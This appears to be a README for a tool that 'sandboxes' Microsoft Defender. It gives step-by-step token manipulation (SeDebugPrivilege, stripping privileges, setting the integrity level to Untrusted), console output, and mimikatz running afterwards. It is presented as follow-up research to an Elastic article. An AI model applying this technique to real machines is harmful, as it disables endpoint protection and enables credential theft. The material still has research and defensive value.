Sandboxing Defender (and probably other AV/EDRs) using Security Token manipulation.
If you do use any of the code in these repositories keep it legal!
This code was written after reading Sandboxing Antimalware Products for Fun and Profit by Elastic Security Research. I am a little bit late to the party it would seem, the article was made public on the 02/02/22 (3 days ago as of writing), and Martin Ingesens' TokenStomp was posted 04/02/22. MUST code faster!
Anyway, writing this code was fun.
The technique is very simple:
- Enable the
SeDubgPrivilege
in our process security token. - Get a handle to Defender using
PROCESS_QUERY_LIMITED_INFORMATION
. - Get a handle to the Defender token using
TOKEN_ALL_ACCESS
. - Disable all privileges in the token using
SetPrivilege
- Set the Defender token Integrity level to Untrusted.
- Do bad things... legally of course!
The main part of the code is here
Execution of the code is shown below (then executing mimikatz after defender is sandboxed):
.\SandboxDefender.exe
[+] Getting a token handle for this process.
[+] Token handle: 0x2EC
[+] Enabling SeDebugPrivilege.
[+] SeDebugPrivilege enabled.
[+] Defender PID: 5212
[+] Getting a process handle for Defender.
[+] Process handle: 0x2F0
[+] Getting a token handle for the Defender process.
[+] Token handle: 0x2F4
[+] Will disable Defender privileges.
[+] Will set Defender Integrity to Untrusted.
[+] Done... Have a nice day!
.\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz #
This is Defender before the sandboxing (in Process Hacker):
This is Defender after the sandboxing (in Process Hacker):